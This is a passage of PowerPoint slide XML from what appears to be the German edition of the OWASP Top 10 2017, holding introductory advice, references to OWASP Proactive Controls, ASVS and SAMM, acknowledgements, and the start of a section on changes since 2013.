                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ständiger Wandel!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Die OWASP Top 10 befinden sich in stetem Wandel. Ohne eine einzige Codezeile in der Anwendung zu ändern kann sie angreifbar werden sobald neue Schwachstellen aufgedeckt und Angriffsmethoden verfeinert werden. Bitte berücksichtigen Sie die Ratschläge am Ende der Top 10 unter Nächste Schritte für </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Entwickler</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Sicherheitstester</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Organisationen</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> und </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId12" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Anwendungs-Verantwortliche</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> für mehr Informationen.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Denke positiv!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Wenn Sie bereit sind, das bloße Reagieren auf Schwachstellen zu beenden und stattdessen den Fokus auf die Implementierung von starken Sicherheits-funktionen in der Anwendung legen wollen, ist das </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>Proactive</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t> Controls</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-Projekt ein guter Startpunkt für Entwickler, um Sicherheit in ihre Anwendungen einzubauen. Der </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>OWASP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t> Security </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>Verification</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t> Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ist ein Leitfaden für Organisationen und Prüfer von Anwendungen.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0">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200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Nutze Tools mit Bedacht!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Sicherheitslücken können sehr komplex und versteckt im Code sein. Oft ist zum Finden und Beseitigen dieser Lücken der Einsatz von Experten mit Profi-Tools am kosteneffektivsten. Das alleinige</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" baseline="0" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Vertrauen auf Tools gibt ein trügerisches Sicherheitsgefühl und wird nicht empfohlen.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Schauen Sie über den Tellerrand!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Machen Sie Sicherheit zu einem integrierten Bestandteil Ihrer IT-Organisation. Informieren Sie sich über das </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>OWASP Software Assurance </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>Maturity</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t> Model (SAMM)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" noProof="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin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1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24889026"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="4001655"/>
          <a:ext cx="3429000" cy="5904345"/>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43159">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Danksagung</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="1600" b="1" noProof="0"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5561186">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Unser Dank gilt den Firmen für das Bereitstellen der Daten über Sicherheitslücken für die 2017-Aktualisierung. Wir erhielten mehr als 40 Antworten auf unseren Aufruf zur Datenerhebung. Zum ersten Mal sind alle zu dem neuen Release beigesteuerten Daten und die</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>vollständige Liste der Mitwirkenden öffentlich einsehbar. Wir denken, dass dies eine der größeren</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>vielfältigeren </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Schwachstellensammlun</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>-gen ist, die je öffentlich gesammelt wurden.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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Aus Platzgründen werden die beitragenden Firmen auf einer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1"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eigenen Seite</a:t>
                      </a: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gewürdigt. Wir möchten diesen Organisationen herzlichst dafür danken, dass sie ganz vorne dabei sind und die gesammelten Schwachstellen öffentlich zur Verfügung gestellt haben. Wir hoffen, das wird sich weiterentwickeln und weitere Organisationen ermutigen diese Richtung zu gehen mit dem Ziel eine nachweisbaren Sicherheit. OWASP Top 10 wäre nicht möglich ohne diese fantastischen Beiträge.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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Ein großer Dank geht an über 500 Einzelpersonen die sich die Zeit für die Expertenumfrage nahmen. Ihre Stimme half bei der Aufnahme von zwei neuen Risiken</a:t>
                      </a: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 die OWASP Top 10. Die Kommentare, Ermutigungen und Kritikpunkte waren durchgehend willkommen. Wir wissen Ihre Zeit ist wertvoll und wir möchten Ihnen dafür danken.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" sz="950" noProof="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lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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Wir wollen uns bei jenen Personen bedanken, die in besonderem Maße konstruktive Kommentare und Zeit für den Review dieses Updates beigesteuert haben. So weit wie möglich sind sie auf der Seite ‘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="950" b="1"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Danksagung</a:t>
                      </a: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aufgeführt.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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Abschließend danken wir im Voraus allen Übersetzern dort draußen, die diese Version der </a:t>
                      </a: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7"/>
                        </a:rPr>
                        <a:t>Top 10 in zahlreiche Sprachen</a:t>
                      </a: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um OWASP Top 10 auf dem ganzen Planet leichter zugänglich zu machen.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:endPar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E</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Einleitung</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="621110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3706241768"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="939600"/>
          <a:ext cx="6854400" cy="8966400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6854400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="343625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Was hat sich von Version 2013 zu 2017 verändert?</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775">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Die Veränderungen </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>haben in den letzten vier Jahren zugenommen, folglich wurden auch die OWASP Top 10 aktualisiert. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Wir </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>haben sie </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>vollständig umgestaltet:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> die Methodik und den Prozess der Datenerhebung erneuert, mit der Community vollständig transparent zusammengearbeitet, die Risiken neu priorisiert,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> die Beschreibung der</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" baseline="0" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Risiken jeweils runderneuert </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="de-DE" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
